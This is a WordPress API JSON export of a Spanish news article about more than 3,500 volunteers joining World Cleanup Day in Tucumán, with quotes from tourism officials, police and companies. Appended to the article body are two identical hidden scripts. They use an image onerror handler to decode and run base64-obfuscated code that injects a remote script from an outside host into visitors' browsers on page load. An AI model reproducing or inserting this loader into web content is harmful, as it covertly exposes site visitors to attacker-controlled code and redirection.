{"id":1502,"date":"2022-09-19T12:13:21","date_gmt":"2022-09-19T15:13:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1502"},"modified":"2025-08-14T00:35:05","modified_gmt":"2025-08-14T03:35:05","slug":"tucuman-se-destaco-en-el-dia-mundial-de-la-limpieza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1502","title":{"rendered":"Tucum\u00e1n se destac\u00f3 en el D\u00eda Mundial de la Limpieza"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Con m\u00e1s de 3.500 voluntarios que limpiaron cerca de 100 puntos a lo largo y ancho de la provincia, Tucum\u00e1n marc\u00f3 tendencia a nivel nacional.<\/em><\/h4>\n\n\n\n<p><strong>En el marco de una jornada primaveral y bajo el lema de \u201climpiar los espacios p\u00fablicos\u201d, m\u00e1s de 3.500 tucumanos salieron a levantar residuos en alrededor de 100 destinos de la provincia, unidos en una iniciativa que el Ente Tucum\u00e1n Turismo (ETT) impulsa hace varios a\u00f1os con su programa \u201cYo Me Sumo\u201d.<\/strong><\/p>\n\n\n\n<p class=\"has-text-color\" style=\"color:#595d60\"><em>La jornada fue todo un \u00e9xito con m\u00e1s de 260 voluntarios que participaron en El Cadillal y el Acceso Norte bajo nuestra coordinaci\u00f3n junto al Ministerio de Seguridad, en la que logramos recolectar dos toneladas de residuos\u201d, explic\u00f3 el jefe de la Unidad de Proyectos Especiales del ETT, M\u00e1ximo Lozano Mu\u00f1oz, a cargo del programa.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.comunicaciontucuman.gob.ar\/fotos\/notas\/2022\/09\/19\/220919111701_91002.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La iniciativa se despleg\u00f3 a lo largo y ancho de la provincia y diferentes grupos limpiaron Taf\u00ed del Valle, Simoca, Bella Vista, Burruyacu, Alberdi, Yerba Buena, La Cocha, el Acceso Sur, la ribera del R\u00edo Sal\u00ed y distintos barrios de la Capital provincial, entre ellos, la zona del Parque 9 de Julio.<\/p>\n\n\n\n<p>Son alrededor de 80 las instituciones educativas y asociaciones civiles que participaron de esta jornada mundial, entre ellas, Revoluci\u00f3n Verde, EcoClick, Movimiento Evita Econom\u00eda Popular, Agenda Ambiental, Centro Vecinal Grupo Renacer, Grupo Pachamama, Programa EducActiva, Proyecto ROU, Comunidad Originaria del Mollar, Eco Estaci\u00f3n Ar\u00e1oz, SOS Tierra y Byos.<\/p>\n\n\n\n<p><em>Como en cada oportunidad, Tucum\u00e1n fue la provincia con m\u00e1s voluntarios y puntos de limpieza. \u201cEstamos satisfechos con la respuesta de los tucumanos, que siempre se comprometen y dan el ejemplo. Desde el Ente de Turismo, que preside Sebastian Giobellina, queremos dar el ejemplo con acciones\u201d, remarc\u00f3 Lozano Mu\u00f1oz y sostuvo que \u201csi bien la problem\u00e1tica es amplia, esta es la manera de encararla. En esta plaza tenemos al sector p\u00fablico, al sector privado y al tercer sector, las asociaciones civiles, porque creemos que solo con un trabajo mancomunado tendremos una provincia mejor\u201d, enfatiz\u00f3. &nbsp;&nbsp;<\/em><\/p>\n\n\n\n<p><strong>De la jornada particip\u00f3 la Polic\u00eda de Tucum\u00e1n a trav\u00e9s de sus Institutos, que aportaron alrededor de 150 aspirantes a agentes que se distribuyeron en el Acceso Norte, uno de los portales de ingreso a Tucum\u00e1n, y en la ruta de ingreso a El Cadillal. \u201cEs un d\u00eda muy especial porque el Gobierno de la Provincia, a trav\u00e9s del Ente Tucum\u00e1n Turismo y el Ministerio de Seguridad colaboramos en esta jornada de limpieza y concientizaci\u00f3n para cuidar nuestra casa, nuestro planeta\u201d, expres\u00f3 el subsecretario de Seguridad, Rolando G\u00f3mez. \u201cLa Polic\u00eda es parte de la sociedad y estamos al servicio, no solo en lo que hace a prevenci\u00f3n y seguridad, sino en todo lo que se necesite, como lo es el cuidado del medio ambiente\u201d, resalt\u00f3 el funcionario.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.comunicaciontucuman.gob.ar\/fotos\/notas\/2022\/09\/19\/220919111714_68564.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Un d\u00eda para vivir en familia<\/p>\n\n\n\n<p>La jornada del D\u00eda Mundial de la Limpieza se convirti\u00f3 en una oportunidad para reunir a las familias en el marco de una actividad recreativa y l\u00fadica. Este fue el caso de la Planta de Tucum\u00e1n de Grupo Arca Continental, que en la misma fecha celebraba el D\u00eda del Voluntariado. \u201cFuimos invitados por el Ente de Turismo y nos vino excelente porque siempre estamos buscando realizar alguna acci\u00f3n hacia la comunidad\u201d, manifest\u00f3 Hugo Arce, gerente de Capital Humano de la empresa. Sobre la convocatoria, el referente explic\u00f3 que fue un \u00e9xito: \u201cReunimos a 50 voluntarios que est\u00e1n participando con sus hijos, con su familia, limpiando la zona del perilago. Es un evento muy grato y nuestra gente est\u00e1 acostumbrada hace ya 14 a\u00f1os\u201d, resalt\u00f3 y celebr\u00f3 la conjunci\u00f3n de esfuerzos entre el sector p\u00fablico y privado.<\/p>\n\n\n\n<p><strong>En este sentido, Germ\u00e1n Valdez, trabajador de Arca Continental, arrib\u00f3 a El Cadillal acompa\u00f1ado de sus hijas Nina, Lupe y Maia. \u201cMe enter\u00e9 de la acci\u00f3n en el trabajo y me pareci\u00f3 algo hermoso. Estoy muy entusiasmado y me gusta poder incentivar a mis hijas a cuidar el ambiente\u201d, agreg\u00f3.&nbsp;<\/strong><\/p>\n\n\n\n<p>Por su parte, Walter y Cecilia est\u00e1n casados y ambos trabajan en la empresa embotelladora. \u201cEs una muy buena iniciativa porque podemos participar con nuestra familia y concientizar sobre la limpieza de nuestro entorno. Siempre que podemos participamos de jornadas organizadas por la empresa, que nos transmite la importancia del reciclado\u201d, explic\u00f3 Walter. Su esposa, en tanto, resalt\u00f3 la necesidad de \u201cinculcar estas acciones a nuestros hijos para que ellos tambi\u00e9n cuiden. Adem\u00e1s, este lugar es bell\u00edsimo y est\u00e1 abierto a todos. Lo \u00fanico que tenemos que aportar como sociedad es su cuidado\u201d, exhort\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.comunicaciontucuman.gob.ar\/fotos\/notas\/2022\/09\/19\/220919111722_55707.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por \u00faltimo, Jos\u00e9 Luis Elis, oriundo de Lastenia, paseaba por El Cadillal junto a sus hijas y vio al grupo de voluntarios. \u201cNos quisimos sumar porque es una muy buena iniciativa para mejorar nuestra calidad de vida y cuidar el ambiente, sobre todo en este lugar que tiene una belleza natural imponente\u201d, expres\u00f3 el padre de familia, quien decidi\u00f3 ponerse los guantes y sumar su granito de arena por Tucum\u00e1n. &nbsp;<\/p>\n\n\n\n<p><strong>El cuidado del medio ambiente empieza en casa<\/strong><\/p>\n\n\n\n<p>Una de las acciones m\u00e1s coloridas de la jornada en El Cadillal fue, sin dudas, el ecocanje de aceite comestible por plantines colmados de flores. Andrea L\u00f3pez, representante de Byos, sostuvo que la empresa quiso estar presente en la celebraci\u00f3n bajo una consigna muy particular: \u201cLe pedimos a la gente que junte el aceite que utiliza en su casa para intercambiarlo por un plant\u00edn\u201d, indic\u00f3. \u201cEl aceite es sumamente perjudicial y si llega a un espejo de agua tan grande como El Cadillal, produce una contaminaci\u00f3n muy importante. Por ello ense\u00f1amos la importancia de reciclar este aceite en vez de tirarlo por los desag\u00fces\u201d, se\u00f1al\u00f3. &nbsp; &nbsp;&nbsp;<\/p>\n\n\n\n<p>Por su parte, \u00darsula Ortega, docente de una instituci\u00f3n educativa, impulsa desde 2019 un proyecto de recuperaci\u00f3n de residuos s\u00f3lidos urbanos como papel, cart\u00f3n o pl\u00e1stico \u201cy un residuo muy t\u00f3xico como lo son las colillas de cigarrillo. Durante toda la jornada, incentivamos a los voluntarios a depositar las que encontraban tiradas en el suelo dentro de un botell\u00f3n seguro. Con esta iniciativa comenzamos a visibilizar un residuo que estaba muy naturalizado en nuestra sociedad y que ahora nos empieza a hacer ruido\u201d, concluy\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.comunicaciontucuman.gob.ar\/noticia\/color-c\/214866\/tucuman-se-destaco-dia-mundial-limpieza\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_201429_www.institucionalturismotuc.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1338\" width=\"365\" height=\"41\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con m\u00e1s de 3.500 voluntarios que limpiaron cerca de 100 puntos a lo largo y ancho de la provincia, Tucum\u00e1n marc\u00f3 tendencia a nivel nacional. En el marco de una jornada primaveral y bajo el lema de \u201climpiar los espacios p\u00fablicos\u201d, m\u00e1s de 3.500 tucumanos salieron a levantar residuos en alrededor de 100 destinos de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1503,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-1502","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1502"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1502"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1502\/revisions"}],"predecessor-version":[{"id":7345,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1502\/revisions\/7345"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1503"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}